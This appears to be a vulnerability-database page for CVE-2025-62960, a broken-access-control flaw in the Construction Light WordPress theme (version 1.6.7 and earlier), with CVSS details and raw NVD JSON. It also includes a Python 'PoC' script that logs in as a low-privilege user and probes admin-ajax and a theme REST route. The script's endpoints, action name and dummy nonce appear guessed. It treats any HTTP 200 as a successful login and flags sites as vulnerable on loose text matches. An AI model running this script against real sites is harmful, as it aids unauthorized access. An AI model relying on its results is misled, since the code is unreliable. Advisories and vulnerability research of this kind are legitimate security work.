Security Vulnerability Report
中文
CVE-2025-62960 CVSS 5.4 MEDIUM

CVE-2025-62960

Published: 2025-12-18 17:15:54
Last Modified: 2026-04-23 15:34:53

Description

Missing Authorization vulnerability in sparklewpthemes Construction Light construction-light allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Construction Light: from n/a through <= 1.6.7.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Construction Light主题 <= 1.6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62960 PoC - Missing Authorization in Construction Light Theme # Target: WordPress site with Construction Light theme <= 1.6.7 def check_vulnerability(target_url, username, password): """ Check if the target WordPress site is vulnerable to CVE-2025-62960 """ session = requests.Session() # WordPress login login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } try: # Attempt login response = session.post(login_url, data=login_data, timeout=10) if 'wordpress_logged_in' in str(session.cookies) or response.status_code == 200: print(f"[+] Login successful with user: {username}") # Try to access theme options/settings that should require admin privileges # This is a low-privilege user accessing admin functionality vulnerable_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/construction-light/v1/options", ] for endpoint in vulnerable_endpoints: # Try to access or modify theme settings test_data = { 'action': 'construction_light_get_options', 'nonce': 'test' } resp = session.get(endpoint, params=test_data, timeout=10) if resp.status_code == 200 and 'construction' in resp.text.lower(): print(f"[!] VULNERABLE: Low-privilege user can access {endpoint}") print(f"[+] Response snippet: {resp.text[:200]}...") return True print("[-] Not vulnerable or authentication failed") return False except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-62960.py <target_url> <username> <password>") print("Example: python cve-2025-62960.py http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] check_vulnerability(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62960", "sourceIdentifier": "[email protected]", "published": "2025-12-18T17:15:54.437", "lastModified": "2026-04-23T15:34:52.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in sparklewpthemes Construction Light construction-light allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Construction Light: from n/a through <= 1.6.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/construction-light/vulnerability/wordpress-construction-light-theme-1-6-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}